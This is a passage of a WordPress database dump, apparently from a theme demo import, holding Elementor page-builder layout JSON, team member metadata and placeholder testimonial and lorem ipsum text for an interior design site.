lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72b0264\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"097c6c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"bcfb858\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c89147\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d8cf87d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3ca0de\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"d1a9295\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"807dfde\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9fe7239\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"682b6ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f17e180\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"44bef5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"13d4194\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4feef43\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fd75c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c06dabc\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(2321,4654,'_elementor_page_assets','a:0:{}'),(2322,4654,'_wxr_import_has_attachment_refs','1'),(2323,4655,'ova_team_met_avatar_id','923'),(2324,4655,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-03.jpg'),(2325,4655,'ova_team_met_job','Architecture'),(2326,4655,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:20:\"https://twitter.com/\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:41:\"https://www.facebook.com/ovatheme.envato/\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.pinterest.com/\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.instagram.com/\";}}'),(2327,4655,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\n<p>Lorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.</p>\r\n\r\n<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.</p>'),(2328,4655,'ova_team_met_order_team','1'),(2329,4655,'_elementor_edit_mode','builder'),(2330,4655,'_elementor_template_type','wp-post'),(2331,4655,'_elementor_version','3.6.6'),(2332,4655,'_wp_page_template','default'),(2333,4655,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":40,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b1c78b6\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b35674a\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"f6c85fe\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27c1be6\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d2671f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"a61f2bd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91355df\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e06b4f6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f2bb79e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"49ac777\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"7a518f5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"21dc602\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"dab0350\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"06b4b1f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"2790340\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"ef7e04a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"72ea037\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4c25ffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ffa8158\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(2334,4655,'_elementor_page_assets','a:0:{}'),(2335,4655,'_wxr_import_has_attachment_refs','1'),(2336,4656,'ova_team_met_avatar_id','922'),(2337,4656,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-02.jpg'),(2338,4656,'ova_team_met_job','Interior designer'),(2339,4656,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:20:\"https://twitter.com/\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:41:\"https://www.facebook.com/ovatheme.envato/\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.pinterest.com/\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:26:\"https://www.instagram.com/\";}}'),(2340,4656,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\n<p>Lorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.</p>\r\n\r\n<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.</p>'),(2341,4656,'ova_team_met_order_team','1'),(2342,4656,'_elementor_edit_mode','builder'),(2343,4656,'_elementor_template_type','wp-post'),(2344,4656,'_elementor_version','3.6.6'),(2345,4656,'_wp_page_template','default'),(2346,4656,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":85,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":40,\